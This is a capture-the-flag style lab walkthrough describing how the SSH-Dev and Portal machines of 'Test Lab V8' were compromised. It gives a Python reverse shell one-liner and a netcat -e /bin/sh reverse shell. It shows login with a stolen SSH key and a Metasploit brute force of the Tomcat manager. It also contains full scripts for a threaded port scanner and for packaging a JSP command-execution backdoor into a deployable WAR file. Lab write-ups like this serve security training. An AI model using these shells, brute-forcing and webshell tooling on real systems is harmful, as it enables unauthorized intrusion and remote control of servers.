Test Lab V8: SSH-Dev and Portal

Attack on SSH-Dev: As the diagram above shows, SSH-Dev has the IP 172.16.0.3, which cannot be pinged from the VPN network. So we checked the ping response from the Cabinet system instead, which we already compromised in the first part of this article by uploading a PHP shell. Through that same backdoor we ran the ping command against SSH-Dev.

SSH-Dev is therefore reachable from Cabinet. To attack SSH-Dev we first need an interactive shell on Cabinet, so we started a netcat listener on our attacking machine with the following command: nc -lvp 80

Then, through the PHP backdoor on Cabinet, we ran the following Python reverse shell one-liner, which connects back to our listener on port 80, redirects stdin/stdout/stderr over the socket and spawns a PTY (replace <10.10.X.X> with the attacking machine's VPN IP):

python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" <10.10.X.X> 80

With that we have interactive shell access on the Cabinet system.

Next we upload Westfall's SSH private key to Cabinet through the same file-upload vulnerability.

Then, from the Cabinet shell, we moved to the uploads folder where Westfall's key landed and used it to connect to SSH-Dev over SSH. Note that the key file must be readable only by its owner (chmod 600 key.txt), otherwise the ssh client refuses to use it. The command was: ssh -i key.txt [email protected]

After that we ran ls for a directory listing and found the token file.

Portal Attack: Portal's IP is 192.168.0.3, which is also not reachable from the VPN. To reach Portal we must first connect via the Cisco VPN and then to the SSH server (how we gained access to the SSH server is covered in the third part of this article). From the SSH server we now need to scan Portal's ports, so we wrote a Python-based port scanner that covers the full port range.

We uploaded the Python scanner to the public folder of the SSH server with scp, using the following command: sudo scp -i /root/Desktop/ /root/Desktop/ [email protected]:/public
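The scanner itself is not reproduced on the page, so the following is an added example, not the original author's script: a threaded TCP connect() scanner of the kind a pivot host without nmap calls for. It probes a port range against a target host and returns the open ports; the self_check() function is a constructed offline check that opens one listener on loopback and confirms the scanner reports it open and a released port closed. The target host and port range on the command line are assumptions for the usage line.

```python
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Full TCP connect() probe: True if host:port completes the handshake."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # connection refused, unreachable, or timed out
        return False


def scan_ports(host, ports, timeout=1.0, workers=64):
    """Probe every port in `ports` concurrently; return the sorted open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def self_check():
    """Constructed offline check: one listener on loopback must be reported
    open, and a port that was just bound and released must be reported closed."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))      # kernel picks a free port
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                        # nothing listens on this port now
    try:
        found = scan_ports("127.0.0.1", [open_port, closed_port], timeout=0.5)
    finally:
        listener.close()
    return open_port in found and closed_port not in found


if __name__ == "__main__":
    # usage (assumed): python3 portscan.py <host> [first_port] [last_port]
    target = sys.argv[1]
    first = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    last = int(sys.argv[3]) if len(sys.argv) > 3 else 65535
    for p in scan_ports(target, range(first, last + 1)):
        print(f"{target}:{p} open")
```

A full connect() scan completes the handshake on every open port and therefore shows up in the target's service logs; on a lab pivot that is acceptable, on an engagement the timeout and worker count are the knobs to tune so that the scan does not trip a rate-based alert or exhaust the pivot host's ephemeral ports.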


We tried some default credentials for Apache Tomcat but none worked. We decided to brute-force the Tomcat manager login with the Metasploit auxiliary module. RHOSTS is localhost and RPORT is 9000 because Portal's Tomcat is reached through a forward via the SSH server rather than directly. In msfconsole we ran:
- use auxiliary/scanner/http/tomcat_mgr_login
- set RHOSTS localhost
- set RPORT 9000
- set PASS_FILE /usr/share/wordlists/dirb/big.txt
- set USER_AS_PASS true
- set BLANK_PASSWORDS true
- set STOP_ON_SUCCESS true
- set THREADS 20
- run

In the end we found a valid credential pair: tomcat : hydrogen

Now we need a reverse shell from this system, and for that we upload a JSP-based backdoor. As shown below it is packaged as cmd.war, which the Tomcat manager can deploy as a web application.

In the manager's "WAR file to deploy" section, click Browse, select cmd.war and deploy it.

Once deployed, the backdoor is reachable in the browser at http://127.0.0.1:9000/cmd/cmd.jsp
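The contents of the page's cmd.war are not shown, so the following is an added example rather than the author's file: a Python script that packages a minimal JSP command backdoor into a WAR the way the deployment above expects. The JSP source, the web.xml descriptor and the file name cmd.war are constructed for illustration. The JSP runs the value of a `cmd` query parameter with Runtime.exec() and returns its stdout, which is what lets a command like netcat -e /bin/sh <ip> 443 be launched from the browser once the WAR is deployed.

```python
import io
import zipfile

# Constructed minimal JSP command backdoor (illustrative, not the page's cmd.jsp).
# Runtime.exec(String) splits the command on whitespace, so a single parameter
# such as "netcat -e /bin/sh 10.10.1.2 443" runs with its arguments intact.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader rd = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = rd.readLine()) != null) {
        out.println(line);
    }
}
%>
"""

# Minimal deployment descriptor. Tomcat 7+ deploys a WAR without one, older
# versions expect it, so including it costs nothing.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5"></web-app>
"""


def build_war(jsp_name="cmd.jsp", jsp_source=CMD_JSP):
    """Return the bytes of a WAR (a plain zip) holding one JSP at its root.
    Deployed as cmd.war, Tomcat serves the page at /cmd/<jsp_name>."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, to verify the packaging before uploading it."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


if __name__ == "__main__":
    # usage (assumed): python3 make_war.py  ->  writes cmd.war in the current directory
    data = build_war()
    with open("cmd.war", "wb") as fh:
        fh.write(data)
    print("wrote cmd.war containing", war_entries(data))
```

The context path is taken from the WAR's file name, which is why cmd.war ends up under /cmd/. Such a backdoor is unauthenticated by design and should be undeployed from the manager once the engagement step is done; leaving it in webapps hands the same access to anyone who can reach port 9000.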

We started netcat on our local system in listening mode with: nc -lvp 443

Then, through the backdoor, we executed: netcat -e /bin/sh <localsystemIP> 443 (the -e option exists only in netcat builds that support it, such as the traditional netcat; the OpenBSD variant does not have it.)

And we got a shell from the Portal system.

We searched for the token file from the shell's current directory with: find -name "*token*"

The token was found under the /webapps/ROOT/ directory, and we read it with the cat command.
